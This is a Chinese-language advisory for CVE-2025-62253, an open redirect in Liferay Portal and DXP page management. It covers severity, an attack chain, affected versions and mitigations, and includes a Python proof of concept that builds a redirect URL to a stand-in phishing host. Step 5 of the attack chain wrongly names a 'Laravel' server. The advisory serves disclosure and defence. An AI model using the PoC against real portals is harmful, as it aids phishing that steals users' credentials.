CVE-2025-62253 Liferay Portal页面管理开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-62253

漏洞类型

开放重定向(Open Redirect)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal, Liferay DXP

漏洞概述

CVE-2025-62253是Liferay Portal和Liferay DXP中的一个开放重定向漏洞。该漏洞存在于页面管理功能中，攻击者可以通过操纵_com_liferay_layout_admin_web_portlet_GroupPagesPortlet_redirect参数，将用户重定向到任意外部URL。由于CVSS评分为6.1（中等），攻击复杂度低，无需认证即可利用，但需要用户交互。攻击者可以利用此漏洞进行钓鱼攻击，诱骗用户访问恶意网站，窃取凭据或传播恶意软件。该漏洞影响了Liferay Portal 7.4.0至7.4.3.97版本，以及多个Liferay DXP版本。Liferay官方已发布安全公告并提供修复版本，建议用户尽快升级到最新补丁版本以消除安全风险。

技术细节

该开放重定向漏洞位于Liferay Portal的页面管理模块（GroupPagesPortlet）中。漏洞产生的根本原因是应用程序未对用户提交的_redirect参数进行充分的验证和过滤。攻击者可以在URL中构造恶意的_redirect参数值，将其指向外部恶意网站。当合法用户点击包含恶意重定向链接时，会被自动跳转到攻击者控制的网站。攻击流程如下：攻击者首先构造包含恶意_redirect参数的URL，该参数包含外部网站的URL地址。然后通过钓鱼邮件、恶意网站或其他社会工程手段诱导用户访问该恶意链接。用户访问后，浏览器会自动执行重定向操作，跳转到攻击者指定的外部网站。由于重定向发生在Liferay Portal的域名下，用户可能不会察觉到异常，从而增加了钓鱼攻击的成功率。此漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明攻击者通过网络远程利用，无需认证但需要用户交互。

攻击链分析

STEP 1

步骤1

攻击者收集目标Liferay Portal/DXP实例的URL信息

STEP 2

步骤2

攻击者构造包含恶意_redirect参数的URL，将参数值设置为外部钓鱼网站

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意链接或社交工程手段诱导目标用户访问构造的恶意URL

STEP 4

步骤4

用户点击链接后，浏览器向Liferay服务器发起请求

STEP 5

步骤5

Laravel服务器未验证_redirect参数，直接执行重定向操作

STEP 6

步骤6

用户浏览器被重定向到攻击者控制的恶意网站，用户可能泄露敏感信息或下载恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62253 Open Redirect PoC
# Target: Liferay Portal/DXP
# Attack Vector: _com_liferay_layout_admin_web_portlet_GroupPagesPortlet_redirect parameter

import requests
import urllib.parse

def exploit_open_redirect(target_url, malicious_url):
    """
    Exploit CVE-2025-62253 Open Redirect vulnerability
    
    Args:
        target_url: Base URL of vulnerable Liferay instance
        malicious_url: Malicious URL to redirect victims to
    """
    # Encode the malicious URL for the redirect parameter
    encoded_redirect = urllib.parse.quote(malicious_url, safe='')
    
    # Construct the exploit URL with the malicious redirect parameter
    exploit_url = f"{target_url}/group/control_panel/manage?p_p_id=com_liferay_layout_admin_web_portlet_GroupPagesPortlet&_com_liferay_layout_admin_web_portlet_GroupPagesPortlet_redirect={encoded_redirect}"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Malicious Redirect URL: {malicious_url}")
    print(f"[*] Exploit URL: {exploit_url}")
    
    # Send request to verify vulnerability
    try:
        response = requests.get(exploit_url, allow_redirects=False, timeout=10)
        
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            if malicious_url in location:
                print(f"[!] VULNERABLE: Server redirects to {location}")
                return True
        
        # Also check for meta refresh or JavaScript redirect
        if malicious_url in response.text:
            print(f"[!] VULNERABLE: Redirect found in response body")
            return True
            
        print(f"[*] Not vulnerable or no redirect detected")
        return False
        
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return False

# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-liferay.com"
    malicious = "https://evil-phishing-site.com/fake-login"
    exploit_open_redirect(target, malicious)

影响范围

Liferay Portal 7.4.0 - 7.4.3.97

Liferay Portal older unsupported versions

Liferay DXP 2023.Q4.0

Liferay DXP 2023.Q3.1 - 2023.Q3.4

Liferay DXP 7.4 GA - update 92

Liferay DXP 7.3 GA - update 35

Liferay DXP older unsupported versions

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在WAF或反向代理层面添加规则，检测并阻止包含可疑_redirect参数的请求；2) 限制页面管理功能的访问权限，仅允许受信任的管理员访问；3) 监控访问日志，查找异常的外部重定向行为；4) 向用户发送安全公告，提醒不要点击来源不明的链接；5) 考虑临时禁用页面管理功能直到完成补丁更新。